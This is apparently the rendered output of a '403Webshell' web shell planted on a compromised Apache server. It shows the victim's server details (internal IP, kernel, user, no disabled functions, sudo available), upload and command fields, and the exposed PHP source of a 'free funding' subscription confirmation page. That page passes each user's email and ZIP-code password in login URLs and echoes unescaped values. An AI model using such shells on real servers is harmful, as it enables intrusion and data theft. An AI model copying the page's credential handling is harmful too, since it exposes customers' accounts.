403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/americasgotfunding.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/americasgotfunding.com/confirm_subscription.php
<?php
require_once($_SERVER['DOCUMENT_ROOT'].'/assets/includes/php_header.php');

$title = $_SITE_NAME." : Confirmation"; 
include('assets/includes/header2.php'); ?>
		<style>.q { font-weight: bold; }</style>
		<!--INFO AREA + BOX MIDDLE-->
			<div style="background:url(assets/images/box_middle.png) repeat-y; width:1000px; float:left;">
					
				<!--COLUMN-->
				<div id="one_column" class="terms">
		
					<div style="text-align:center;">		
						<h1>Step 3: Login &amp; Start Applying!</h1>
						<p>Congratulations! You are on your way to applying for Funding!</p>
						<p>Below is your Account Information that will allow you to access the Member's Site right now!</p>
						<center>
							<div class="table_container">
								<table class="tableform" width="100%">
									<tr>
										<td valign="middle" colspan="3"><p class="tabletitle" style="text-align:center;">This registration fee will appear on your credit card statement as:</p></td>
									</tr>
									<tr>
										<td valign="middle" colspan="3"><p class="tabletitle" style="text-align:center;"><span style="color:black;">GOTFUNDING</style> 8669758363</p></td>
									</tr>
									<tr>
										<td valign="middle" colspan="3"><p class="tabletitle" style="text-align:center;">If you have any questions please call: 866-975-8363</p></td>
									</tr>
									<tr>
										<td valign="middle" colspan="3"><p class="tabletitle" style="text-align:center;">**PLEASE PRINT THIS PAGE FOR YOUR RECORDS**</p></td>
									</tr>
								</table>
							</div>
						</center>
						<center>
							<div class="table_container">
		        				<table class="tableform" width="100%">
									<tr>
										<td valign="middle" colspan="3"><p class="tabletitle">User Account Info</p></td>
									</tr>
		        					<tr>
		        						<td class="q">Website:</td>
		        						<td class="a"><a href="/login?user=<?= $cc_email; ?>&pass=<?= $cc_zip; ?>&login_source=confirmation_page"><?= $_SERVER['SERVER_NAME']; ?>/login</a></td>
		        						<td>
		        							<input type='button' value='Log me in now!' style="cursor: pointer; font-size: 15px;" onclick="window.location='http://<?= $_SERVER['SERVER_NAME']; ?>/login?user=<?= $cc_email; ?>&pass=<?= $cc_zip; ?>';"/>
		        						</td>
		        					</tr>
		        					<tr>
		        						<td class="q">Username:</td>
		        						<td class="a"><?= $cc_email; ?></td>
		        					</tr>
		        					<tr>
		        						<td class="q">Password:</td>
		        						<td class="a"><?= $cc_zip; ?></td>
		        					</tr>
		        				</table>
							</div>
						</center>
						<center>
							<div class="table_container">
			        			<table class="tableform" width="100%">
									<tr>
										<td valign="middle" colspan="3"><p class="tabletitle">Personal Information Summary</p></td>
									</tr>
						        	<tr>
						           	  	<td class="q">First Name:</td>
						            	<td class="a"><?= $cc_fname; ?></td>
						            	<td class="q">Last Name:</td>
						           	  	<td class="a"><?= $cc_lname; ?></td>
						            </tr>
						        	<tr>
						            	<td class="q">Street Address:</td>
						           	  	<td class="a"><?= $cc_addr; ?></td>
										<td class="q">City:</td>
						           	  	<td class="a"><?= $cc_city; ?></td>
						           </tr>
						        	<tr>
						            	<td class="q">State:</td>
						           	  	<td class="a"><?= $cc_state; ?></td>
										<td class="q">Zip:</td>
						            	<td class="a"><?= $cc_zip; ?></td>
						            </tr>
						        	
						            <!--
						            <tr>
						            	<td class="q">Gender:</td>
						            	<td class="a"><?= $app_gender; ?></td>
						            	<td class="q">Age:</td>
						            	<td class="a"><?= $app_age; ?></td>
						            </tr>
						            //-->
									<tr>
						            	<td class="q">Day Phone:</td>
						                <td class="a">
						                	<?= $cc_phonearea; ?>-<?= $cc_phoneprefix; ?>-<?= $cc_phoneextension; ?>
						                </td>
										<td colspan="2" class="q">&nbsp;</td>
						            </tr>
						        </table>
					        </div>
						</center>
			        	<center>
							<div class="table_container">
		        				<table class="tableform" width="100%">
									<tr>
										<td valign="middle" colspan="3"><p class="tabletitle">Payment Information Summary</p></td>
									</tr>
			        				<tr>
						           	  	<td class="q">Credit Card Number:</td>
						            	<td class="a"><?= $partial_cc_num; ?></td>
						            </tr>
						            <tr>
						            	<td class="q">Exp:</td>
						           	  	<td class="a"><?= $cc_month; ?> / <?= $cc_year; ?></td>
						            </tr>
									<tr>
										<td class="q">Amount:</td>
										<td colspan="3" class="a"><?= number_format($initial_subscription_fee,2); ?></td>
									</tr>
						       	</table>
						 	</div>
						</center>
						<center>
							<div class="table_container">
			        			<table class="tableform" width="100%">
			        				<tr>
										<td valign="middle" colspan="3"><p class="tabletitle">Customer Service Contact Information</p></td>
									</tr>
									<tr>
										<td>Toll Free Number: <?=$_SITE_PHONE;?></td>
									</tr>
									<tr>
										<td>Email Address: <?=$_SITE_EMAIL;?></td>
									</tr>
								</table>
								<p>	You will have access to the applications and training materials through the <strong><?=$_SITE_NAME;?></strong> site 
								for your processing fee of $<?= number_format($initial_subscription_fee,2); ?>. </p>
								
								<p>You will also access to the most up to date  
								funding applications through the "New Opportunities" section of the <strong><?=$_SITE_NAME;?></strong> site for the next
								<?= $monthly_subscription_trial; ?> days and continued access to the "New Opportunities" section there after for the 
								monthly amount of $<?= number_format($monthly_subscription_fee,2); ?>. </p> 
								
								<p><strong>WE ALSO HAVE A GUARANTEE. <u>If you don't qualify 
								for a Free Funding Program, you will be refunded immediately</u>.</strong> Just provide us with the funding application you 
								applied for and the response letter from the funding program. <strong>Either you qualify for the Free Funding Program or you 
								will have your payment refunded to you.</strong> <a href="http://<?=$_SERVER['SERVER_NAME']?>/terms">Terms &amp; Conditions</a>.
								</p>
							</div>
						</center>
				
				
					</div> <!--end centered div-->
				</div> <!--end one column-->
				
				<div style="clear:both;"></div>
			
			</div> <!--end info area-->
			<div style='display:none;'>
				<!-- Google Code for AGF Sale Conversion Page -->
				<script type="text/javascript">
				/* <![CDATA[ */
				var google_conversion_id = 1004896619;
				var google_conversion_language = "en";
				var google_conversion_format = "1";
				var google_conversion_color = "ffffff";
				var google_conversion_label = "iyzUCK3x7gEQ64KW3wM";
				var google_conversion_value = 0;
				if (29.95) {
				  google_conversion_value = 29.95;
				}
				/* ]]> */
				</script>
				<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
				</script>
				<noscript>
				<div style="display:inline;">
				<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1004896619/?value=29.95&amp;label=iyzUCK3x7gEQ64KW3wM&amp;guid=ON&amp;script=0"/>
				</div>
				</noscript>
				
				<script type="text/javascript">if (!window.mstag) mstag = {loadTag : function(){},time : (new Date()).getTime()};</script> <script id="mstag_tops" type="text/javascript" src="//flex.atdmt.com/mstag/site/3ea7a529-5358-4429-9fe1-ef51c181e68b/mstag.js"></script> <script type="text/javascript"> mstag.loadTag("conversion", {cp:"5050",dedup:"1"})</script> <noscript> <iframe src="//flex.atdmt.com/mstag/tag/3ea7a529-5358-4429-9fe1-ef51c181e68b/conversion.html?cp=5050&dedup=1" frameborder="0" scrolling="no" width="1" height="1" style="visibility:hidden; display:none"> </iframe> </noscript>
			</div>
<!--INCLUDE FOOTER-->
<?php include('assets/includes/footer.php'); ?>			

Youez - 2016 - github.com/yon3zu
LinuXploit